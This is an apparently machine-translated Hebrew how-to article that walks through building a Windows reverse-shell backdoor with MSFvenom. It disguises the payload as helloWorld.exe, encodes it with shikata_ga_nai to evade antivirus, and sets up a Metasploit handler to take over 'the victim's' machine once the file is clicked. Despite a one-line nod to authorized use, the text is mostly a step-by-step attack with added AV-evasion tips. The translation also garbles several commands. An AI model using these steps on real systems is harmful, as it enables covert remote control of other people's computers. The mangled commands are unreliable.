כיצד ליצור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom ב- Kali Linux

2024 מְחַבֵּר: Gilbert Ryder | [email protected]. שונה לאחרונה: 2023-12-16 17:31

דלת אחורית משמשת לעקיפת מנגנוני אבטחה, לרוב בחשאי ובעיקר ללא גילוי. באמצעות MSFvenom, השילוב של msfpayload ו- msfencode, ניתן ליצור דלת אחורית המתחברת חזרה לתוקף באמצעות TCP מעטפת הפוכה. על מנת לפתח דלת אחורית, עליך לשנות את חתימת התוכנה הזדונית שלך כדי להתחמק מכל תוכנת אנטי וירוס. השלימו את הפרויקט הזה על זוג מחשבים שאליהם יש לכם הרשאה לגשת, ותוך כדי כך תוכלו ללמוד עוד על אבטחת מחשבים ועל אופן הפעולה של דלת אחורית.

צעדים

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux

שלב 1. הפעל את Kali והפעל את מסוף הטרמינל

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom ב- Kali Linux שלב 2

שלב 2. הקלד ifconfig כדי להציג את הממשק ובדוק את כתובת ה- IP שלך

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom ב- Kali Linux שלב 3

שלב 3. הקלד מקודדים msfvenom -l כדי להציג את רשימת המקודדים

תשתמש ב- x86/shikata_ga_nai כמקודד

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom ב- Kali Linux שלב 4

שלב 4. הקלד "msfvenom -a x86 -פלטפורמת windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

-A x86 -Windows פלטפורמה מייצגת ארכיטקטורה לשימוש.
-p windows/shell/reverse_tcp מייעד את המטען להטמעה.
LHOST מייעד את כתובת ה- IP של המאזין.
LPORT מייעד את יציאת המאזין.
-b "\ x00" מציין להימנע מתו רע (בתים null).
-e x86/shikata_ga_nai מציין את שם המקודדים.
-f exe> helloWorld.exe מציין פלט פורמט.

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 5

שלב 5. הקלד msfconsole להפעלת Metasploit

עכשיו יצרת את הדלת האחורית שלך. כאשר הקורבן לוחץ על helloWorld.exe, מטען המעטפת המוטמע יופעל ויחזור למערכת שלך. על מנת לקבל את החיבור, עליך לפתוח את המטפל המרובה ב- Metasploit ולהגדיר את המטען

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 6

שלב 6. הקלד use exploit/multi/handler

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 7

שלב 7. הקלד הגדרות מטען windows/shell/reverse_tcp

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom ב- Kali Linux שלב 8

שלב 8. הקלד אפשרויות הצג כדי לבדוק את המודול

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 9

שלב 9. הקלד set LHOST 192.168.48.129

"LHOST" מציין את כתובת ה- IP של המאזין

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 10

שלב 10. הקלד סט LPORT 4444

"LPORT" מציין את יציאת המאזין

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 11

שלב 11. הקלד הפעלה והמתן לחיבור מהמכונה של הקורבן

צור דלת אחורית כמעט בלתי ניתנת לגילוי באמצעות MSFvenom בשלב Kali Linux שלב 12

שלב 12. המתן עד שהקורבן ילחץ על helloWorld.exe

אז תהיה מחובר בהצלחה למכונה של הקורבן.

טיפים

שימוש ב- -i ב- MSFvenom ייצג את האיטרציות של הקידוד. לפעמים חזרות נוספות עשויות לעזור להתחמק מתוכנת AV.
למדת כיצד ליצור את הדלת האחורית והמקודדת באמצעות MSFvenom, אך שיטה זו לא תפעל בצורה מושלמת נגד חלק מתוכנות ה- AV בימינו. הסיבה מאחורי זה היא בגלל תבניות הביצוע ב- MSFvenom. ספקי ה- AV הוסיפו את החתימה הסטטית של התבניות האלה ופשוט חפשו אותן. הפתרון לבעיה זו הוא שימוש בתבנית ביצוע שונה או בכלים שונים.